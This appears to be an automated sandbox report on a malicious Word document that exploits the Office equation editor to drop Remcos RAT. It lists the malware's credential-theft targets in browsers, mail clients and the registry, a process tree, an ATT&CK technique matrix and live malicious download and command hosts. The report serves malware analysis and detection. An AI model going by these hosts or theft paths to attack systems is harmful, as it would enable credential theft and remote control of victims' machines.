Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Queries volume information: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\ VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.BackgroundIntelligentTransfer.Management\1.0.0.0__31bf3856ad364e35\Microsoft.BackgroundIntelligentTransfer.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_MSIL\Microsoft.Windows.Diagnosis.TroubleshootingPack\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.TroubleshootingPack.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\assembly\GAC_32\Microsoft.Windows.Diagnosis.SDEngine\6.1.0.0__31bf3856ad364e35\Microsoft.Windows.Diagnosis.SDEngine.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db VolumeInformation
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db VolumeInformation
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Queries volume information: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db VolumeInformation
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Code function: 12_2_10002264 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Code function: 22_2_004082CD memset,memset,memset,memset,GetComputerNameA,GetUserNameA,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,strlen,strlen,memcpy
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 25_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Code function: 21_2_0041739B GetVersionExW
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

                  Stealing of Sensitive Information

Source: Yara match | File source: 25.2.znlzneAxBVd.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.plugman23456.scr.34f9570.6.unpack, type: UNPACKEDPE
Source: Yara match | File source: 25.2.znlzneAxBVd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.plugman23456.scr.3572190.5.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.plugman23456.scr.3572190.5.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.plugman23456.scr.34f9570.6.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.885917708.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.396020237.0000000000914000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.886068183.0000000000E9F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000C.00000002.885963497.0000000000748000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.378816554.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: plugman23456.scr PID: 3396, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: plugman23456.scr PID: 3704, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: znlzneAxBVd.exe PID: 3252, type: MEMORYSTR
Source: Yara match | File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 25_2_0040BA12 \AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 25_2_0040BB30 \AppData\Roaming\Mozilla\Firefox\Profiles\
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | Code function: 25_2_0040BB30 \key3.db
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail <.oeaccount
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail *
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail NULL
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup *
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup NULL
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new *
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Directory queried: C:\Users\user\AppData\Local\Microsoft\Windows Mail\Backup\new NULL
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\places.sqlite
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\secmod.db
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\key3.db
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\7xwghk55.default\cert8.db
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Key opened: HKEY_CURRENT_USER\Software\Paltalk
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Key opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45a
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4add
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live Mail
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Code function: 22_2_004033F0 ESMTPPassword
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Code function: 22_2_00402DB3 _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword
Source: C:\Users\user\AppData\Roaming\plugman23456.scr | Code function: 22_2_00402DB3 _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword
Source: Yara match | File source: Process Memory Space: plugman23456.scr PID: 4068, type: MEMORYSTR

                  Remote Access Functionality

Source: C:\Users\user\AppData\Roaming\plugman23456.scr; Mutex created: \Sessions\1\BaseNamedObjects\Rmc-BW3KDF
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe; Mutex created: \Sessions\1\BaseNamedObjects\Rmc-BW3KDF
Source: Yara match; File source: 25.2.znlzneAxBVd.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.plugman23456.scr.34f9570.6.unpack, type: UNPACKEDPE
Source: Yara match; File source: 25.2.znlzneAxBVd.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.plugman23456.scr.3572190.5.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.plugman23456.scr.3572190.5.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 5.2.plugman23456.scr.34f9570.6.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 0000000C.00000002.885917708.00000000006F4000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000019.00000002.396020237.0000000000914000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000002.886068183.0000000000E9F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 0000000C.00000002.885963497.0000000000748000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000019.00000002.395655089.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: 00000005.00000002.378816554.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match; File source: Process Memory Space: plugman23456.scr PID: 3396, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: plugman23456.scr PID: 3704, type: MEMORYSTR
Source: Yara match; File source: Process Memory Space: znlzneAxBVd.exe PID: 3252, type: MEMORYSTR
Source: Yara match; File source: C:\ProgramData\remcos\logs.dat, type: DROPPED
Source: C:\Users\user\AppData\Roaming\znlzneAxBVd.exe; Code function: cmd.exe 25_2_0040569A
Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
Gather Victim Identity Information | 1 Scripting | Valid Accounts | 11 Native API | 1 Scripting | 1 DLL Side-Loading | 11 Disable or Modify Tools | 2 OS Credential Dumping | 2 System Time Discovery | Remote Services | 11 Archive Collected Data | 23 Ingress Tool Transfer | Exfiltration Over Other Network Medium | 1 System Shutdown/Reboot
Credentials | Domains | Default Accounts | 33 Exploitation for Client Execution | 1 DLL Side-Loading | 1 Bypass User Account Control | 1 Deobfuscate/Decode Files or Information | 211 Input Capture | 1 Account Discovery | Remote Desktop Protocol | 1 Data from Local System | 2 Encrypted Channel | Exfiltration Over Bluetooth | Network Denial of Service
Email Addresses | DNS Server | Domain Accounts | 13 Command and Scripting Interpreter | 1 Windows Service | 1 Access Token Manipulation | 41 Obfuscated Files or Information | 2 Credentials in Registry | 1 System Service Discovery | SMB/Windows Admin Shares | 2 Email Collection | 1 Non-Standard Port | Automated Exfiltration | Data Encrypted for Impact
Employee Names | Virtual Private Server | Local Accounts | 1 Scheduled Task/Job | 1 Scheduled Task/Job | 1 Windows Service | 1 Install Root Certificate | 3 Credentials In Files | 4 File and Directory Discovery | Distributed Component Object Model | 211 Input Capture | 1 Remote Access Software | Traffic Duplication | Data Destruction
Gather Victim Network Information | Server | Cloud Accounts | 2 Service Execution | Network Logon Script | 222 Process Injection | 12 Software Packing | LSA Secrets | 38 System Information Discovery | SSH | 3 Clipboard Data | 2 Non-Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | 1 Scheduled Task/Job | 1 DLL Side-Loading | Cached Domain Credentials | 3 Security Software Discovery | VNC | GUI Input Capture | 122 Application Layer Protocol | Data Transfer Size Limits | Service Stop
DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 1 Bypass User Account Control | DCSync | 31 Virtualization/Sandbox Evasion | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 11 Masquerading | Proc Filesystem | 4 Process Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 31 Virtualization/Sandbox Evasion | /etc/passwd and /etc/shadow | 1 Application Window Discovery | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
IP Addresses | Compromise Infrastructure | Supply Chain Compromise | PowerShell | Cron | Cron | 1 Access Token Manipulation | Network Sniffing | 1 System Owner/User Discovery | Shared Webroot | Local Data Staging | File Transfer Protocols | Exfiltration Over Asymmetric Encrypted Non-C2 Protocol | External Defacement
Network Security Appliances | Domains | Compromise Software Dependencies and Development Tools | AppleScript | Launchd | Launchd | 222 Process Injection | Input Capture | 1 Remote System Discovery | Software Deployment Tools | Remote Data Staging | Mail Protocols | Exfiltration Over Unencrypted Non-C2 Protocol | Firmware Corruption
Behavior Graph ID: 1465260
Sample: Offer ZI-0428.doc
Start date: 01/07/2024
Architecture: WINDOWS
Score: 100

• 2 (start node); signatures: 68 Found malware configuration; 70 Malicious sample detected (through community Yara rule); 72 Antivirus detection for URL or domain; 74 18 other signatures
  • 9 WINWORD.EXE 291 18 (started by 2)
    • 13 EQNEDT32.EXE 11 (started by 9)
      • DNS/IP 66: sinopecllc.top 31.192.235.145, 49164, 80 GLESYS-ASSE Russian Federation
      • File 58: C:\Users\user\AppData\...\plugman23456.scr, PE32, dropped
      • File 60: C:\Users\user\AppData\Local\...\plug[1].scr, PE32, dropped
      • Signatures: 102 Office equation editor establishes network connection; 104 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
      • 22 plugman23456.scr 5 (started by 13)
        • File 54: C:\Users\user\AppData\...\znlzneAxBVd.exe, PE32, dropped
        • File 56: C:\Users\user\AppData\Local\...\tmpF0B6.tmp, XML, dropped
        • Signatures: 84 Antivirus detection for dropped file; 86 Tries to steal Mail credentials (via file registry); 88 Machine Learning detection for dropped file; 92 3 other signatures
        • 34 plugman23456.scr 3 13 (started by 22)
          • DNS/IP 62: antfly50.sytes.net 80.85.154.121, 1980, 49165, 49166 CHELYABINSK-SIGNAL-ASRU Russian Federation
          • DNS/IP 64: geoplugin.net 178.237.33.50, 49167, 80 ATOM86-ASATOM86NL Netherlands
          • File 52: C:\ProgramData\remcos\logs.dat, data, dropped
          • Signatures: 76 Detected Remcos RAT; 78 Maps a DLL or memory area into another process; 80 Installs a global keyboard hook
          • 45 plugman23456.scr (started by 34); signatures: 94 Tries to steal Instant Messenger accounts or passwords; 96 Tries to steal Mail credentials (via file / registry access); 98 Searches for Windows Mail specific files
          • 48 plugman23456.scr (started by 34); signature: 100 Tries to harvest and steal browser information (history, passwords, etc)
          • 50 plugman23456.scr (started by 34)
        • 39 powershell.exe 4 (started by 22); signature: 82 Installs new ROOT certificates
        • 41 powershell.exe 4 (started by 22)
        • 43 schtasks.exe (started by 22)
    • 18 EQNEDT32.EXE (started by 9)
  • 11 taskeng.exe 1 (started by 2)
    • 20 znlzneAxBVd.exe (started by 11)
      • Signatures: 106 Antivirus detection for dropped file; 108 Contains functionality to bypass UAC (CMSTPLUA); 110 Machine Learning detection for dropped file; 112 6 other signatures
      • 26 znlzneAxBVd.exe (started by 20); signature: 90 Detected Remcos RAT
      • 28 powershell.exe (started by 20)
      • 30 powershell.exe (started by 20)
      • 32 schtasks.exe (started by 20)

Source | Detection | Scanner | Label | Link
Offer ZI-0428.doc | 47% | ReversingLabs | Document-RTF.Exploit.CVE-2017-11882 |
Offer ZI-0428.doc | 40% | Virustotal | | Browse

Source | Detection | Scanner | Label
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\plug[1].scr | 100% | Avira | HEUR/AGEN.1362875
C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | 100% | Avira | HEUR/AGEN.1362875
C:\Users\user\AppData\Roaming\plugman23456.scr | 100% | Avira | HEUR/AGEN.1362875
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\plug[1].scr | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\znlzneAxBVd.exe | 100% | Joe Sandbox ML |
C:\Users\user\AppData\Roaming\plugman23456.scr | 100% | Joe Sandbox ML |
                  No Antivirus matches
                  No Antivirus matches
Source | Detection | Scanner | Label
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
https://www.chiark.greenend.org.uk/~sgtatham/putty/0 | 0% | URL Reputation | safe
http://geoplugin.net/json.gp | 0% | URL Reputation | safe
http://www.imvu.comr | 0% | Avira URL Cloud | safe
http://acdn.adnxs.com/ast/ast.js | 0% | Avira URL Cloud | safe
https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1 | 0% | Avira URL Cloud | safe
https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9 | 0% | Avira URL Cloud | safe
http://b.scorecardresearch.com/beacon.js | 0% | Avira URL Cloud | safe
http://sinopecllc.top/plug.scriiC: | 100% | Avira URL Cloud | malware
http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html | 0% | Avira URL Cloud | safe
http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png | 0% | Avira URL Cloud | safe
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_ | 0% | Avira URL Cloud | safe
https://support.google.com/chrome/?p=plugin_flash | 0% | Avira URL Cloud | safe
https://www.google.com | 0% | Avira URL Cloud | safe
https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js | 0% | Avira URL Cloud | safe
http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683 | 0% | Avira URL Cloud | safe
http://www.nirsoft.net | 0% | Avira URL Cloud | safe
http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com | 0% | Avira URL Cloud | safe
https://deff.nelreports.net/api/report?cat=msn | 0% | Avira URL Cloud | safe
antfly50.sytes.net | 100% | Avira URL Cloud | malware
http://geoplugin.net/json.gp/C | 0% | Avira URL Cloud | safe
http://sinopecllc.top/plug.scr | 100% | Avira URL Cloud | malware
http://cache.btrll.com/default/Pix-1x1.gif | 0% | Avira URL Cloud | safe
http://o.aolcdn.com/ads/adswrappermsni.js | 0% | Avira URL Cloud | safe
https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033 | 0% | Avira URL Cloud | safe
http://www.msn.com/?ocid=iehp | 0% | Avira URL Cloud | safe
http://cdn.taboola.com/libtrc/msn-home-network/loader.js | 0% | Avira URL Cloud | safe
http://www.msn.com/de-de/?ocid=iehp | 0% | Avira URL Cloud | safe
http://www.nirsoft.net/ | 0% | Avira URL Cloud | safe
http://static.chartbeat.com/js/chartbeat.js | 0% | Avira URL Cloud | safe
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto% | 0% | Avira URL Cloud | safe
https://login.yahoo.com/config/login | 0% | Avira URL Cloud | safe
https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%3 | 0% | Avira URL Cloud | safe
http://p.rfihub.com/cm?in=1&pub=345&userid=1614522055312108683 | 0% | Avira URL Cloud | safe
https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=9 | 0% | Avira URL Cloud | safe
http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js | 0% | Avira URL Cloud | safe
https://www.ccleaner.com/go/app_cc_pro_trialkey | 0% | Avira URL Cloud | safe
https://contextual.media.net/8/nrrV73987.js | 0% | Avira URL Cloud | safe
http://www.imvu.com/ | 0% | Avira URL Cloud | safe
http://www.imvu.com | 0% | Avira URL Cloud | safe
http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh | 0% | Avira URL Cloud | safe
http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids( | 0% | Avira URL Cloud | safe
http://sinopecllc.top/plug.scrC: | 100% | Avira URL Cloud | malware
https://contextual.media.net/ | 0% | Avira URL Cloud | safe
http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js | 0% | Avira URL Cloud | safe
https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2 | 0% | Avira URL Cloud | safe
http://www.msn.com/ | 0% | Avira URL Cloud | safe
https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=591650497549 | 0% | Avira URL Cloud | safe
https://www.google.com/accounts/servicelogin | 0% | Avira URL Cloud | safe
